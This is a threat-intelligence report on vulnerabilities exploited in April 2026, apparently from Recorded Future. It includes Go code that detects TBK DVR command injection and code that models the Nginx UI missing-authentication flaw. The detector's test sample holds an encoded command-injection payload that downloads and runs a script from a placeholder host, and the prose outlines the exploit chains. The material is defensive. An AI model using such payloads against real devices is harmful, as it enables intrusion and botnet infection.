April 2026 CVE Landscape
In April 2026, Insikt Group® identified 37 high-impact vulnerabilities that should be prioritized for remediation, 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.
31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.
Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and server platforms, developer and application-delivery software, remote support tools, and network-edge infrastructure.
In April, Insikt Group created Nuclei templates for the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987). These Nuclei templates are available to Recorded Future customers.
Quick Reference: April 2026 Vulnerability Table
All 31 vulnerabilities below were actively exploited in April 2026. This table does not include the 6 CVEs associated with honeypot activity. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.
Table 1: List of vulnerabilities that were actively exploited in April based on Recorded Future data (excluding honeypot-sourced CVEs).
Key Trends: April 2026
- In April 2026, seven of the 37 vulnerabilities in this report were linked to ransomware activity.
- Six are explicitly tied to Storm-1175's Medusa ransomware operations.
- CISA has also linked CVE-2026-41940 with known ransomware use (Sorry Ransomware, per open source reporting).
- Additionally, threat actors exploited CVE-2024-3721 in TBK DVR devices to deliver the Nexcorium botnet.
- Sixteen of the 37 vulnerabilities enabled remote code execution (RCE), affecting products from twelve vendors: Adobe, Apache, D-Link, Fortinet, Google, Ivanti, Kentico, Marimo, Microsoft, SimpleHelp, TrueConf, and Wazuh.
- Insikt Group® identified public proof-of-concept (PoC) exploits for 24 of the 37 vulnerabilities in this report.
- The most commonly observed flaws this month were CWE-22 (Path Traversal), followed by CWE-94 (Code Injection), CWE-20 (Improper Input Validation), and CWE-306 (Missing Authentication for Critical Function).
- Three of the 37 vulnerabilities are at least five years old, with the oldest approximately seventeen years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was two days.
Exploitation Analysis
This section highlights some of the highest-impact, actively exploited vulnerabilities this month: those linked to known threat actor campaigns, those with public PoC exploits available, and those for which Insikt Group® has created Nuclei templates to detect the vulnerability. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.
Threat Actors Exploit TBK DVR Vulnerability (CVE-2024-3721) to Deliver Nexcorium
On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, formerly known as Twitter), associated with Fortinet (@Fortinet), published a technical analysis detailing a campaign that exploits TBK Digital Video Recorder (DVR) devices to deliver Nexcorium, a Mirai-based botnet. A TBK DVR device is a surveillance system recorder that captures, stores, and allows playback or remote viewing of video from connected security cameras. According to FortiGuard Labs, Nexcorium targets TBK DVR-4104 and DVR-4216 systems by exploiting CVE-2024-3721, an operating system (OS) command injection vulnerability that allows remote threat actors to execute arbitrary system commands.
Based on FortiGuard Labs’ analysis, the campaign begins with the exploitation of CVE-2024-3721 through crafted requests that manipulate the mdb and mdc arguments in TBK DVR devices, which delivers a downloader script named dvr. The exploit includes the HTTP header X-Hacked-By with the value Nexus Team - Exploited By Erratic. The dvr script retrieves Nexcorium binaries with filenames beginning with nexuscorp for architectures such as ARM, MIPS R3000, and x86-64. The dvr script then sets the Nexcorium binaries’ permissions to 777, and executes them with an argument that identifies the compromised system.
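The indicators FortiGuard Labs describes (shell commands smuggled through the mdb and mdc parameters, the X-Hacked-By header, the nexuscorp binary prefix) translate directly into a log-side check. The following Go program is an added example written for this article, not FortiGuard Labs' or Recorded Future's code: it inspects raw HTTP request heads and reports why one resembles CVE-2024-3721 exploitation. The request path and the addresses in the embedded samples are constructed placeholders; the DVR's actual endpoint is not given above. One practical detail it shows is that Go's url.ParseQuery silently drops any pair containing a semicolon, which is exactly the character a command-injection payload relies on, so the query is split by hand.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Indicators taken from the FortiGuard Labs analysis summarized above.
const (
	hackedByHeader = "x-hacked-by"
	hackedByValue  = "Nexus Team - Exploited By Erratic"
	binaryPrefix   = "nexuscorp"
)

// Characters that never belong in a legitimate mdb/mdc value and that a
// command-injection payload needs in order to chain or substitute commands.
var shellMeta = []string{";", "|", "&", "`", "$("}

// queryParams splits a raw query on "&" only and percent-decodes both sides.
// url.ParseQuery is deliberately avoided: since Go 1.17 it discards any pair
// containing ";", which would hide the very payloads we are looking for.
func queryParams(rawQuery string) map[string][]string {
	out := map[string][]string{}
	for _, pair := range strings.Split(rawQuery, "&") {
		if pair == "" {
			continue
		}
		k, v, _ := strings.Cut(pair, "=")
		if dk, err := url.QueryUnescape(k); err == nil {
			k = dk
		}
		if dv, err := url.QueryUnescape(v); err == nil {
			v = dv
		}
		out[k] = append(out[k], v)
	}
	return out
}

// inspectRequest takes a raw HTTP request head (request line followed by
// header lines) and returns the reasons it resembles CVE-2024-3721
// exploitation. An empty result means nothing suspicious was found.
func inspectRequest(raw string) []string {
	var reasons []string
	lines := strings.Split(strings.ReplaceAll(raw, "\r\n", "\n"), "\n")
	if len(lines) == 0 {
		return reasons
	}

	// Request line: METHOD TARGET VERSION. Only the query string matters here.
	if parts := strings.Fields(lines[0]); len(parts) >= 2 {
		if _, rawQuery, ok := strings.Cut(parts[1], "?"); ok {
			params := queryParams(rawQuery)
			for _, key := range []string{"mdb", "mdc"} {
				for _, v := range params[key] {
					for _, m := range shellMeta {
						if strings.Contains(v, m) {
							reasons = append(reasons, fmt.Sprintf("shell metacharacter %q in %s parameter", m, key))
							break
						}
					}
					if strings.Contains(v, binaryPrefix) {
						reasons = append(reasons, fmt.Sprintf("Nexcorium binary prefix %q in %s parameter", binaryPrefix, key))
					}
				}
			}
		}
	}

	// Header lines: the campaign tags its requests with X-Hacked-By.
	for _, h := range lines[1:] {
		name, value, ok := strings.Cut(h, ":")
		if !ok || !strings.EqualFold(strings.TrimSpace(name), hackedByHeader) {
			continue
		}
		reasons = append(reasons, "X-Hacked-By header present")
		if strings.TrimSpace(value) == hackedByValue {
			reasons = append(reasons, "header value matches the Nexcorium campaign")
		}
	}
	return reasons
}

// Constructed samples for offline testing. The path is a placeholder, not the
// DVR's real endpoint. The encoded mdc value decodes to
// "cd /tmp;wget http://192.0.2.10/dvr;sh dvr", i.e. fetch and run the dvr
// downloader described above.
const maliciousSample = "GET /cgi?mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.10%2Fdvr%3Bsh%20dvr HTTP/1.1\r\n" +
	"Host: 192.0.2.50\r\n" +
	"X-Hacked-By: Nexus Team - Exploited By Erratic\r\n"

const benignSample = "GET /cgi?mdb=sos&mdc=status HTTP/1.1\r\n" +
	"Host: 192.0.2.50\r\n" +
	"User-Agent: curl/8.0\r\n"

func main() {
	fmt.Println("malicious:", inspectRequest(maliciousSample))
	fmt.Println("benign:   ", inspectRequest(benignSample))
}
```

The check keys on the parameters and the header rather than on a path, so it survives minor variations in how the request is built; the percent-decoding step matters because the real payloads arrive URL-encoded.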
Further technical details associated with this activity, including sample analysis and IoCs, are available to Recorded Future customers via Insikt Group reporting.
Recorded Future customers can also access Malware Intelligence queries, which surface samples that connect to known network indicators.
Insikt® Validated TTP: Using Nuclei to Detect CVE-2026-33032, an Actively Exploited Missing Authentication Vulnerability Affecting Nginx UI
On March 28, 2026, GitHub user Jacky (0xJacky) published an advisory in the Nginx UI repository detailing CVE-2026-33032, together with a PoC exploit. CVE-2026-33032 is a Missing Authentication for Critical Function vulnerability in Nginx UI; the advisory lists all versions as affected (the version discrepancy is discussed below). Nginx UI is a web-based management interface for Nginx that lets administrators view status, create and modify configuration files, and control operations such as reloads and restarts. Exploiting CVE-2026-33032 allows an unauthenticated remote threat actor to create, modify, or delete configuration files, trigger configuration reloads, and restart the service, resulting in a complete Nginx service takeover.
According to Recorded Future data, active exploitation of CVE-2026-33032 was observed on April 1, 2026, on deception technology honeypots, four days after the Nginx UI advisory and PoC were published. Public version metadata for CVE-2026-33032 is inconsistent. The GitHub advisory currently lists the affected range as “all versions” with no patched version, and downstream records such as NVD/OSV have reflected broader affected ranges. However, the advisory author’s later technical analysis states that those ranges are incorrect, that version 2.3.3 is the last vulnerable version, and that version 2.3.4 contains the fix. Accordingly, we assess the most accurate affected range to be version 2.3.3 and earlier, while noting that some third-party databases may still show broader ranges due to discrepancies in advisory metadata.
The vulnerability resides in Nginx UI's MCP router and IP allowlist middleware. The /mcp endpoint enforces both IP allowlisting and authentication, while the /mcpmessage endpoint enforces only IP allowlisting. Because the default IP allowlist is empty and the middleware treats an empty list as allow-all (fail-open), unauthenticated requests to /mcpmessage reach the same mcp.ServeHTTP() handler that processes all MCP tool invocations. As a result, a remote threat actor with network access can invoke privileged MCP functions via /mcpmessage and take over Nginx management operations without credentials.
Based on the advisory, the PoC requires an operator-supplied JSON-RPC request that specifies the MCP tool to invoke and its arguments. The example uses the JSON-RPC method tools/call, the tool name nginxconfigadd, and five tool arguments: name, content, basedir, overwrite, and syncnodeids. The PoC sends the crafted request to /mcpmessage without an Authorization header; because the allowlist check treats the empty default list as allow-all, the service accepts it and forwards it to mcp.ServeHTTP(), which dispatches the selected MCP tool. In the example, nginxconfigadd writes a new nginx configuration file with the supplied name inside the chosen base directory and then triggers an immediate nginx reload.
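To make the fail-open allowlist and the missing authentication on /mcpmessage concrete, here is an added example in Go, written for this article and not taken from Nginx UI or the advisory. Using only Go's standard net/http, it reconstructs the two routes described above behind one shared MCP handler: the weak wiring, where /mcp carries allowlist plus authentication but /mcpmessage carries the allowlist alone and an empty list admits everyone, beside a hardened wiring that authenticates every route and fails closed on an empty list. The stand-in handler, the bearer token, the peer addresses, and the placeholder argument values in the probe body are assumptions; the tool name and paths are reproduced as printed above.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"strings"
)

// mcpHandler stands in for the shared mcp.ServeHTTP() handler that dispatches
// every MCP tool call. Anything that reaches it performs a privileged action.
var mcpHandler = http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
	fmt.Fprintln(w, "MCP tool dispatched")
})

// clientIP strips the port from the peer address.
func clientIP(r *http.Request) string {
	if host, _, err := net.SplitHostPort(r.RemoteAddr); err == nil {
		return host
	}
	return r.RemoteAddr
}

// ipAllowlist admits only listed peers. With failOpen set it reproduces the
// weak behavior described above: an empty list admits everyone, not nobody.
func ipAllowlist(allow []string, failOpen bool, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		ip := clientIP(r)
		for _, a := range allow {
			if a == ip {
				next.ServeHTTP(w, r)
				return
			}
		}
		if failOpen && len(allow) == 0 { // empty default list treated as allow-all
			next.ServeHTTP(w, r)
			return
		}
		http.Error(w, "forbidden", http.StatusForbidden)
	})
}

// requireAuth demands a bearer token; the comparison is constant-time.
func requireAuth(token string, next http.Handler) http.Handler {
	want := []byte("Bearer " + token)
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := []byte(r.Header.Get("Authorization"))
		if subtle.ConstantTimeCompare(got, want) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// vulnerableMux wires the routes as the advisory describes them: /mcp gets
// allowlist plus authentication, /mcpmessage gets the fail-open allowlist only.
func vulnerableMux(allow []string, token string) http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/mcp", ipAllowlist(allow, true, requireAuth(token, mcpHandler)))
	mux.Handle("/mcpmessage", ipAllowlist(allow, true, mcpHandler))
	return mux
}

// hardenedMux authenticates every route that reaches the MCP handler and makes
// the allowlist fail closed when nothing is configured.
func hardenedMux(allow []string, token string) http.Handler {
	mux := http.NewServeMux()
	for _, p := range []string{"/mcp", "/mcpmessage"} {
		mux.Handle(p, ipAllowlist(allow, false, requireAuth(token, mcpHandler)))
	}
	return mux
}

// probe sends one JSON-RPC-shaped POST through the router and returns the HTTP
// status. The body follows the shape of the advisory's PoC request; the tool
// arguments are left empty on purpose.
func probe(h http.Handler, path, remoteAddr, authorization string) int {
	body := `{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"nginxconfigadd","arguments":{}}}`
	req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(body))
	req.RemoteAddr = remoteAddr
	if authorization != "" {
		req.Header.Set("Authorization", authorization)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	attacker := "203.0.113.9:51234" // unlisted peer, no credentials
	fmt.Println("vulnerable /mcp:        ", probe(vulnerableMux(nil, "s3cret"), "/mcp", attacker, ""))
	fmt.Println("vulnerable /mcpmessage: ", probe(vulnerableMux(nil, "s3cret"), "/mcpmessage", attacker, ""))
	fmt.Println("hardened   /mcpmessage: ", probe(hardenedMux(nil, "s3cret"), "/mcpmessage", attacker, ""))
}
```

Run stand-alone, the vulnerable router answers the unauthenticated /mcp probe with 401 but lets the identical /mcpmessage probe through with 200, which is the whole bug; the hardened router returns 403 on the empty list and 401 for a listed peer without a token. The general lesson is that an IP allowlist is a restriction layered on top of authentication, never a substitute for it, and its empty state must be defined explicitly rather than left to whatever a loop over zero entries happens to do.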
The advisory states that a successful exploit can give an operator control over nginx configuration management and traffic handling. The advisory describes a complete takeover of the nginx service, including the ability to create, modify, or delete configuration files within the config directory and trigger immediate reload or restart actions. The advisory also describes traffic interception, service disruption due to invalid configuration changes, configuration exfiltration via readable nginx config files, and credential harvesting via injected logging directives that capture Authorization headers to enable escalation to the REST API.
Insikt Group® created a Nuclei template to detect CVE-2026-33032, which is available to Recorded Future customers. At the time of writing, Shodan showed 3,002 exposed Nginx UI instances, the majority geolocated in China, the US, Indonesia, Germany, and Hong Kong. Not all of these are necessarily vulnerable, since their versions are unknown.
Take Action
Timely and relevant information on vulnerabilities in your environment and that of your vendors and suppliers is critical for reducing risk. Find out how Recorded Future can support your team by increasing visibility, improving efficiency, and enabling confident decisions.
Vulnerability Intelligence – Prioritize vulnerabilities based on the likelihood of exploitation – not just the severity. Easily understand the risk of exploitation alongside severity, and real-time contextualized intelligence to help you quickly make confident decisions, patch what matters, and prevent attacks.
Attack Surface Intelligence – Identify internet-facing assets vulnerable to a specific CVE. Attack Surface Intelligence provides an outside-in view of your organization to help you actively discover, prioritize, and respond to unknown, vulnerable, or misconfigured assets.
Third-Party Intelligence – Gain an external view of the security posture of your vendors and partners. Eliminate time-consuming research and vendor communication cycles with the ability to promptly assess vulnerabilities in their internet-facing systems.
Insikt Group® – Receive access to exclusive reports on new vulnerabilities and trends from Recorded Future’s team of experts, the Insikt Group®. Download Nuclei templates created by Insikt Group® for select CVEs to test potentially vulnerable instances.
Recorded Future Professional Services – Work with our Professional Services team on a Vulnerability Analysis Engagement. Designed to equip your team with advanced strategies for identifying, prioritizing, and mitigating threats effectively, this program delves into technologies and operations essential for a successful vulnerability management program. (Learn more about how our Professional Services team can help elevate your team by watching our recent Vulnerability Prioritization Workshop.)
About Insikt Group®
Recorded Future’s Insikt Group®, the company’s threat research division, comprises analysts and security researchers with deep government, law enforcement, military, and intelligence agency experience. Their mission is to produce intelligence that reduces risk for customers, enables tangible outcomes, and prevents business disruption.